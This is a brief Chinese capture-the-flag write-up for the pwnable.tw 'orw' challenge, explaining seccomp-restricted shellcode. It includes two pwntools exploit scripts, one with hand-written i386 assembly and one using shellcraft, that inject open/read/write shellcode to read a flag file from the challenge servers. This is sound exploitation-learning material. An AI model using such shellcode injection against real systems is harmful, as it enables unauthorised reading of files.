好像没见过这样的题
就汇编来讲,就是写入shellcode然后执行
其中orw_seccomp就是syscall的过滤,相当于一个白名单
大概构造
sys_open(filename="/home/orw/flag")
sys_read(fd=3,count=0x30)
sys_write(fd=1,count=0x30)
当打开一个新的文件时,文件描述符会在系统原有的0、1、2之上增加,POSIX标准要求每次打开文件时必须使用当前进程中最小可用的文件描述符,所以read在写入的时候调用的就是fd=3。
from pwn import *
filename="push 0x6761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f"#/home/orw/flag的16进制
sys_open=";mov eax,0x5;mov ebx,esp;int 0x80;"#eax为5时,int80调用open,ebx是读取filename时栈内的起始位置
sys_read="mov eax,0x3;mov ebx,0x3;mov edx,0x30;int 0x80;"#eax为3时,int80调用read,ebx的值就是fd的值,edx则是count的值
sys_write="mov eax,0x4;mov ebx,0x1;mov edx,0x30;int 0x80;"
shellcode=filename+sys_open+sys_read+sys_write
payload=asm(shellcode)
s=remote('chall.pwnable.tw',10001)
s.recv(1024)
s.sendline(payload)
print s.recv()
s.interactive()
或者用shellcraft
#coding:utf-8
from pwn import *
context(os='linux',arch='i386',log_level='debug')
#sh = process('./orw')
sh = remote('node3.buuoj.cn','25658')
payload = shellcraft.i386.linux.open('flag',0)
payload += shellcraft.i386.linux.read(3,'esp',100)
payload += shellcraft.i386.linux.write(1, 'esp', 100)
sh.sendafter('Give my your shellcode:',asm(payload))
sh.interactive()